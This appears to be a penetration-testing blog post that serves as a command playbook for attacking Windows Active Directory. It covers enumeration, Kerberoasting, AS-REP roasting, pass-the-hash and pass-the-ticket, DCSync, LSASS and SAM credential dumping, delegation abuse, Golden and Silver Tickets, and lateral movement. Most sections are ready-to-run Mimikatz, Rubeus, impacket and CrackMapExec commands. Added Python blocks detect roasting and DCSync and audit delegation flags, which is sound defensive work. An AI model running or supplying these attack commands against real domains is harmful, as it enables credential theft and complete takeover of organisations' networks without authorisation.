
Active Directory Attack Techniques

Jan 15, 2025
3 min read
lawbyte

Active Directory is the backbone of Windows enterprise environments and a high-value target during engagements. This post covers the most impactful AD attack techniques from initial enumeration to domain dominance.

Initial Enumeration

# Domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
net user /domain
net group /domain
net group "Domain Admins" /domain
nltest /dclist:<domain>

# PowerView
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainUser -Properties SamAccountName,MemberOf,Description
Get-DomainGroup "Domain Admins" -Properties Members
Get-DomainComputer -Properties Name,OperatingSystem

# LDAP enumeration (with creds)
ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w password -b "DC=domain,DC=local" "(objectClass=user)"

Kerberoasting

Any domain user can request a service ticket for an account that has an SPN. The ticket is encrypted with the service account's password hash, so it can be cracked offline.

# Find Kerberoastable accounts
Get-DomainUser -SPN | Select-Object SamAccountName,ServicePrincipalName

# Request tickets (PowerView + Rubeus)
Invoke-Kerberoast -OutputFormat Hashcat | Out-File kerberoast.txt
.\Rubeus.exe kerberoast /outputfile:hashes.txt

# From Linux (impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Crack
hashcat -a 0 -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" set do not need a valid password to obtain an AS-REP. The response contains data encrypted with the user's password hash, so it can be cracked offline.

# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName

# From Windows
.\Rubeus.exe asreproast /outputfile:asreproast.txt /format:hashcat

# From Linux
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt
impacket-GetNPUsers domain.local/user:password -dc-ip DC_IP -request

# Crack
hashcat -a 0 -m 18200 asreproast.txt /usr/share/wordlists/rockyou.txt
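Both roasting techniques leave a trace on the domain controller: Kerberoasting shows up as one account requesting RC4 (0x17) service tickets (event 4769) for many service accounts in a short window, and AS-REP roasting as a 4768 with Pre-Authentication Type 0. The detector below is an added example, not part of the original post; the event records are constructed and the field names are a simplified form of the 4768/4769 schema.

```python
# Added example: minimal detection logic for Kerberoasting and AS-REP roasting
# over constructed Windows Security events (not code from the original post).
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. For 4769 "service" is the service account's
# sAMAccountName and "enc" the ticket encryption type; for 4768 "preauth"
# is the Pre-Authentication Type (0 = logon without pre-authentication).
EVENTS = [
    {"id": 4769, "time": "2025-01-15T09:00:01", "account": "jdoe@DOMAIN.LOCAL",
     "service": "svc_sql", "enc": "0x17", "ip": "10.0.0.50"},
    {"id": 4769, "time": "2025-01-15T09:00:02", "account": "jdoe@DOMAIN.LOCAL",
     "service": "svc_web", "enc": "0x17", "ip": "10.0.0.50"},
    {"id": 4769, "time": "2025-01-15T09:00:02", "account": "jdoe@DOMAIN.LOCAL",
     "service": "svc_backup", "enc": "0x17", "ip": "10.0.0.50"},
    {"id": 4769, "time": "2025-01-15T09:10:00", "account": "asmith@DOMAIN.LOCAL",
     "service": "FS01$", "enc": "0x12", "ip": "10.0.0.51"},
    {"id": 4768, "time": "2025-01-15T09:11:00", "account": "svc_legacy",
     "preauth": 0, "enc": "0x17", "ip": "10.0.0.50"},
    {"id": 4768, "time": "2025-01-15T09:11:05", "account": "asmith",
     "preauth": 2, "enc": "0x12", "ip": "10.0.0.51"},
]

def kerberoast_alerts(events, window=timedelta(minutes=5), threshold=3):
    """Accounts that requested >= threshold distinct RC4 service tickets within window."""
    per_account = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["enc"].lower() == "0x17":
            per_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    alerts = []
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # slide the window over each request
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                alerts.append((account, sorted(spns)))
                break
    return alerts

def asrep_alerts(events):
    """4768 events with Pre-Authentication Type 0: the AS-REP is offline-crackable."""
    return [(e["account"], e["ip"]) for e in events
            if e["id"] == 4768 and e.get("preauth") == 0]

if __name__ == "__main__":
    print("kerberoast:", kerberoast_alerts(EVENTS))
    print("asrep:", asrep_alerts(EVENTS))
```

Legitimate RC4 requests from applications that cannot use AES will also trigger the first rule, so tune the threshold per environment and exclude known service hosts.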

Pass the Hash (PtH)

Use NTLM hash instead of cleartext password:

# impacket
impacket-psexec domain/Administrator@DC_IP -hashes :NT_HASH
impacket-wmiexec domain/Administrator@DC_IP -hashes :NT_HASH
impacket-smbexec domain/Administrator@DC_IP -hashes :NT_HASH

# CrackMapExec
crackmapexec smb DC_IP -u Administrator -H NT_HASH --exec-method smbexec
crackmapexec smb 192.168.1.0/24 -u Administrator -H NT_HASH # subnet spray

# evil-winrm
evil-winrm -i DC_IP -u Administrator -H NT_HASH

# Mimikatz
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:NT_HASH /run:cmd.exe

Pass the Ticket (PtT)

Export Kerberos tickets and inject them for auth:

# Mimikatz
sekurlsa::tickets /export # export all tickets to files
kerberos::ptt ticket.kirbi # import ticket

# Rubeus
.\Rubeus.exe triage # list tickets
.\Rubeus.exe dump /luid:0x123456 # dump specific ticket
.\Rubeus.exe ptt /ticket:ticket.kirbi # import

# Linux (impacket)
export KRB5CCNAME=/tmp/krb5cc_ticket
impacket-psexec -k -no-pass domain.local/administrator@DC_FQDN

DCSync

Pull password hashes from the DC as if you were a domain controller (requires Replicating Directory Changes / DS-Replication-Get-Changes):

# Mimikatz (from DA session)
lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /all /csv

# Impacket (from Linux)
impacket-secretsdump domain.local/Administrator:password@DC_IP
impacket-secretsdump -hashes :NT_HASH domain.local/Administrator@DC_IP

# CrackMapExec
crackmapexec smb DC_IP -u Administrator -p password --ntds
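DCSync exercises the replication control-access rights, which a domain controller logs as event 4662 with the right's GUID in the Properties field. The example below is added here and is not from the original post; it assumes the 4662 records have been reduced to the subject, object type and Properties fields, and the records themselves are constructed (the all-zero GUID is a placeholder for an unrelated right).

```python
# Added example (not part of the original post): flag 4662 events that carry
# the DS-Replication-Get-Changes rights when the subject is not a DC account.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Constructed 4662 records: SubjectUserName, ObjectType and the Properties
# field, which lists the control-access right GUIDs that were exercised.
EVENTS_4662 = [
    {"subject": "DC02$", "object_type": "domainDNS",
     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "jdoe", "object_type": "domainDNS",
     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "asmith", "object_type": "user",
     "properties": "Read Property {00000000-0000-0000-0000-000000000000}"},  # placeholder GUID
]

def dcsync_alerts(events, dc_accounts):
    """Return (subject, [right names]) for replication requests not made by a DC."""
    known_dcs = {d.upper() for d in dc_accounts}
    alerts = []
    for e in events:
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(e["properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if rights and e["subject"].upper() not in known_dcs:
            alerts.append((e["subject"], rights))
    return alerts

if __name__ == "__main__":
    for subject, rights in dcsync_alerts(EVENTS_4662, dc_accounts=["DC01$", "DC02$"]):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Auditing of the domain object must be enabled (SACL for "Replicating Directory Changes") for 4662 to be generated at all; Azure AD Connect and similar sync accounts are legitimate non-DC sources to allowlist.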

Credential Dumping

# Mimikatz — dump LSASS
privilege::debug
sekurlsa::logonpasswords # cleartext + NTLM
sekurlsa::wdigest # wdigest (if enabled)

# Dump LSASS process (bypass AV)
Task Manager → Details → lsass.exe → Create dump file
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Then parse offline with mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# SAM database (save the hives on the target first, then parse offline)
reg save HKLM\SAM SAM && reg save HKLM\SYSTEM SYSTEM && reg save HKLM\SECURITY SECURITY
impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY

BloodHound / SharpHound

# Collect all data
.\SharpHound.exe -c All
.\SharpHound.exe -c All --zipfilename output.zip

# From Linux (BloodHound.py)
pip install bloodhound
bloodhound-python -u user -p password -ns DC_IP -d domain.local -c all

# Start BloodHound
neo4j start
bloodhound

# Key BloodHound queries:
# "Find Shortest Paths to Domain Admins"
# "Find Principals with DCSync Rights"
# "Find Kerberoastable Users with Path to DA"
# "Find AS-REP Roastable Users"
# "Find Computers with Unconstrained Delegation"

Delegation Attacks

Unconstrained Delegation

Computers or users with unconstrained delegation cache the TGTs of every user that authenticates to them. Compromising such a machine therefore yields those TGTs.

# Find systems with unconstrained delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" # TRUSTED_FOR_DELEGATION flag

# On compromised system with unconstrained delegation:
.\Rubeus.exe monitor /interval:5 /nowrap # wait for DA TGT
# Then import and use the TGT

Constrained Delegation

A service account with constrained delegation can impersonate any user, but only to the specific services it is allowed to delegate to.

# Find constrained delegation accounts
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Exploit with Rubeus
.\Rubeus.exe s4u /user:svc_account /rc4:NT_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.local" /ptt
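The three roasting and delegation conditions above are all visible in account attributes, so they can be audited before anyone abuses them. This audit is an added example, not from the original post: the account records are constructed, and in practice they would come from PowerView or ldapsearch output.

```python
# Added example (not part of the original post): audit exported account records
# for the userAccountControl flags behind AS-REP roasting, unconstrained and
# constrained delegation, plus user accounts carrying SPNs.
UF_NORMAL_ACCOUNT = 0x200                       # user (not computer) account
UF_SERVER_TRUST_ACCOUNT = 0x2000                # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                     # "sensitive and cannot be delegated" (mitigation)
UF_DONT_REQ_PREAUTH = 0x400000                  # AS-REP roastable
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

# Constructed records: sAMAccountName, userAccountControl, servicePrincipalName,
# msDS-AllowedToDelegateTo. DCs legitimately carry TRUSTED_FOR_DELEGATION.
ACCOUNTS = [
    {"sam": "DC01$", "uac": 0x82000, "spn": ["ldap/dc01.domain.local"], "allowed_to": []},
    {"sam": "WEB01$", "uac": 0x81000, "spn": ["HOST/web01.domain.local"], "allowed_to": []},
    {"sam": "svc_sql", "uac": 0x200, "spn": ["MSSQLSvc/sql01.domain.local:1433"], "allowed_to": []},
    {"sam": "svc_legacy", "uac": 0x400200, "spn": [], "allowed_to": []},
    {"sam": "svc_web", "uac": 0x1000200, "spn": ["HTTP/web01.domain.local"],
     "allowed_to": ["cifs/dc01.domain.local"]},
    {"sam": "admin", "uac": 0x100200, "spn": [], "allowed_to": []},  # NOT_DELEGATED set
]

def audit(accounts):
    """Return (sAMAccountName, finding) pairs in record order."""
    findings = []
    for a in accounts:
        sam, uac = a["sam"], a["uac"]
        if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
            findings.append((sam, "unconstrained delegation on a non-DC"))
        if a["allowed_to"]:
            mode = "protocol transition" if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "Kerberos only"
            findings.append((sam, f"constrained delegation ({mode}) to {', '.join(a['allowed_to'])}"))
        if uac & UF_DONT_REQ_PREAUTH:
            findings.append((sam, "pre-authentication not required (AS-REP roastable)"))
        if a["spn"] and uac & UF_NORMAL_ACCOUNT:  # computer accounts always have SPNs
            findings.append((sam, "user account with SPN (Kerberoastable)"))
    return findings

if __name__ == "__main__":
    for sam, finding in audit(ACCOUNTS):
        print(f"{sam}: {finding}")
```

Privileged accounts such as "admin" above should carry NOT_DELEGATED or sit in Protected Users, which is what keeps them out of every delegation finding.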

Golden Ticket

Forge Kerberos TGT using the krbtgt hash (obtained via DCSync):

# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:KRBTGT_NT_HASH /id:500 /ptt

# Impacket
impacket-ticketer -nthash KRBTGT_NT_HASH -domain-sid S-1-5-21-xxx \
-domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.local/Administrator@DC_FQDN

Silver Ticket

Forge a service ticket using the service account's hash (no contact with the DC is needed):

kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /target:server.domain.local /service:cifs /rc4:SERVICE_ACCOUNT_NT_HASH /ptt

Common Lateral Movement

# PsExec-style (SMB)
impacket-psexec domain/user:password@target_ip

# WMI execution
impacket-wmiexec domain/user:password@target_ip

# WinRM
evil-winrm -i target_ip -u user -p password

# SMB exec
crackmapexec smb target_ip -u user -p password -x "whoami"

# RDP
xfreerdp /u:user /p:password /v:target_ip /cert-ignore
rdesktop target_ip -u user -p password
